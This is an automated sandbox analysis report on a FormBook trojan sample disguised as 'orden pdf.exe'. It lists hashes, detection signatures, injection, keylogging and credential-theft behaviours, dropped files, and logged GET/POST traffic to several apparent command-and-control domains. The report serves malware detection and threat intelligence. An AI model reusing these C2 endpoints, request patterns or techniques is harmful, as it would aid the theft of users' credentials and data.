Analysis Report orden pdf.exe

Overview

General Information

Sample Name: orden pdf.exe
Analysis ID: 339334
MD5: 4f1ad14256cc9c420d78d69b468bab48
SHA1: 7734beec32b17c6ef0678533cc9634bd2c890c65
SHA256: 1f05b369246b2867a66aba3cacd9da9c2f29c03adc4d45883c91054c35ac3345
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AutoIt script contains suspicious strings
Binary is likely a compiled AutoIt script file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for reading data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString, GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different from the original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 2.2.orden pdf.exe.400000.1.raw.unpack Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x998f", "KEY1_OFFSET 0x1db82", "CONFIG SIZE : 0xcd", "CONFIG OFFSET 0x1dc80", "URL SIZE : 26", "searching string pattern", "strings_offset 0x1c7b3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", ...]}
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Fxpx\cx9l_rq2dula.exe ReversingLabs: Detection: 32%
Source: C:\Users\user\AppData\Local\Temp\Fxpx\cx9l_rq2dula.exe ReversingLabs: Detection: 32%
Source: C:\Users\user\assignedaccessproviderevents\DeviceCensus.exe.exe ReversingLabs: Detection: 32%
Multi AV Scanner detection for submitted file
Source: orden pdf.exe Virustotal: Detection: 50%
Source: orden pdf.exe ReversingLabs: Detection: 32%
Yara detected FormBook
Source: Yara match File source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.orden pdf.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.orden pdf.exe.39e0000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: orden pdf.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Source: Binary string: systray.pdb source: orden pdf.exe, 00000002.00000002.300200826.0000000001730000.00000040.00000001.sdmp
Source: Binary string: systray.pdbGCTL source: orden pdf.exe, 00000002.00000002.300200826.0000000001730000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: orden pdf.exe, 00000002.00000002.300447868.000000000185F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: orden pdf.exe
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B6CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_001B6CA9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_001B60DD
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_001B63F9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001BEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_001BEB60
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001BF56F FindFirstFileW,FindClose, 0_2_001BF56F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001BF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_001BF5FA
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_001C1B2F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_001C1C8A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001B60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 1_2_001B60DD
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001B63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 1_2_001B63F9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001BEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_001BEB60
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001B6CA9 GetFileAttributesW,FindFirstFileW,FindClose, 1_2_001B6CA9
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001BF56F FindFirstFileW,FindClose, 1_2_001BF56F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001BF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 1_2_001BF5FA
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001C1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_001C1B2F
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001C1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 1_2_001C1C8A
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001C1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 1_2_001C1F94

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 4x nop then pop edi 2_2_00416D4E

Networking:

HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /n7ak/?rN=+VkjiNhUsWsopaF1OEtkI3uXqkAxa5zmKZmZM9Ocj2MgGwUlx9I3FiG4Gn++IiogSOWw&QZ3=dhrxPpcXO0TLHVR HTTP/1.1Host: www.unbelievabowboutique.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n7ak/?rN=MxLeMLg7J3XdambF4+q7RpqtyYrbwIYxF5p89mR13ayzWNjROKSjcDea1OeFglLEscbA&QZ3=dhrxPpcXO0TLHVR HTTP/1.1Host: www.bepbosch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /n7ak/?rN=AkA4aycEzdcMbgqG3SnLsvna0jaRDewmYiccqrS7y0QXzouDQ+a/DqlUVIMAjPvadelU&QZ3=dhrxPpcXO0TLHVR HTTP/1.1Host: www.hydrabadproperties.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 91.195.240.94
Source: Joe Sandbox View IP Address: 34.102.136.180
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SEDO-ASDE
Source: Joe Sandbox View ASN Name: GOOGLEUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /n7ak/ HTTP/1.1Host: www.bepbosch.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.bepbosch.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bepbosch.com/n7ak/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /n7ak/ HTTP/1.1Host: www.bepbosch.comConnection: closeContent-Length: 194340Cache-Control: no-cacheOrigin: http://www.bepbosch.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bepbosch.com/n7ak/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /n7ak/ HTTP/1.1Host: www.hydrabadproperties.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.hydrabadproperties.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hydrabadproperties.com/n7ak/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /n7ak/ HTTP/1.1Host: www.hydrabadproperties.comConnection: closeContent-Length: 194340Cache-Control: no-cacheOrigin: http://www.hydrabadproperties.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hydrabadproperties.com/n7ak/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_001C4EB5
Source: unknown DNS traffic detected: queries for: www.unbelievabowboutique.com
Source: unknown HTTP traffic detected: POST /n7ak/ HTTP/1.1Host: www.bepbosch.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.bepbosch.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bepbosch.com/n7ak/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.hanaleedossmann.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.hanaleedossmann.com/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.hanaleedossmann.com/n7ak/www.librosdecienciaficcion.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.hanaleedossmann.comReferer:
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.healthywithhook.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.healthywithhook.com/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.healthywithhook.com/n7ak/www.s-immotanger.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.healthywithhook.comReferer:
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.huro14.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.huro14.com/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.huro14.com/n7ak/www.wwwswty6655.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.huro14.comReferer:
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.hydrabadproperties.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.hydrabadproperties.com/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.hydrabadproperties.com/n7ak/www.myultimateleadgenerator.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.hydrabadproperties.comReferer:
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.joomlas123.info
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.joomlas123.info/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.joomlas123.info/n7ak/www.office4u.info
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.joomlas123.infoReferer:
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.librosdecienciaficcion.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.librosdecienciaficcion.com/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.librosdecienciaficcion.com/n7ak/MicrM
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.librosdecienciaficcion.comReferer:
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.manfast.online
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.manfast.online/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.manfast.online/n7ak/www.ultimatewindowusa.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.manfast.onlineReferer:
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.myultimateleadgenerator.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.myultimateleadgenerator.com/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.myultimateleadgenerator.com/n7ak/www.manfast.online
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.myultimateleadgenerator.comReferer:
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.office4u.info
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.office4u.info/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.office4u.info/n7ak/www.hanaleedossmann.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.office4u.infoReferer:
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.s-immotanger.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.s-immotanger.com/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.s-immotanger.com/n7ak/www.joomlas123.info
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.s-immotanger.comReferer:
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.ultimatewindowusa.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.ultimatewindowusa.com/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.ultimatewindowusa.com/n7ak/www.excelcapfunding.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.ultimatewindowusa.comReferer:
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.unbelievabowboutique.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.unbelievabowboutique.com/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.unbelievabowboutique.com/n7ak/www.bepbosch.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.unbelievabowboutique.comReferer:
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.wwwswty6655.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.wwwswty6655.com/n7ak/
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.wwwswty6655.com/n7ak/www.hydrabadproperties.com
Source: explorer.exe, 00000003.00000003.555178824.0000000008907000.00000004.00000001.sdmp String found in binary or memory: http://www.wwwswty6655.comReferer:
Source: explorer.exe, 00000003.00000000.268773020.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_001C6B0C
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001C6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_001C6B0C
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001B2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_001B2B37
Installs a raw input device (often for capturing keystrokes)
Source: orden pdf.exe, 00000000.00000003.250435560.0000000001712000.00000004.00000001.sdmp Binary or memory string: _WINAPI_REGISTERRAWINPUTDEVICES
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 0_2_001DF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_001DF7FF
Source: C:\Users\user\Desktop\orden pdf.exe Code function: 1_2_001DF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 1_2_001DF7FF

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.607214261.0000000004750000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.254106611.00000000039E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.607131734.0000000004720000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.595803176.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.290887183.000000000405B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.475944331.0000000004881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.299989543.00000000016A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.235563814.0000000004C51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.471310625.0000000006199000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.237790988.00000000045AA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.234835560.0000000004604000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.286789881.00000000046AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.299600121.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.471275038.0000000004F2E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472988822.00000000061C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.237750274.00000000045A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 2.2.orden pdf.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.orden pdf.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.orden pdf.exe.39e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.orden pdf.exe.39e0000.1.unpack, type: UNPACKEDPE

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\systray.exe Dropped file: C:\Users\user\AppData\Roaming\KN26O6T1\KN2logri.ini
Source: C:\Windows\SysWOW64\systray.exe Dropped file: C:\Users\user\AppData\Roaming\KN26O6T1\KN2logrv.ini
Malicious sample detected (through community Yara rule)
Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.234787113.0000000004C7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.300045336.00000000016D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000003.281421598.0000000003FA3000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000003.475384338.0000000004880000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
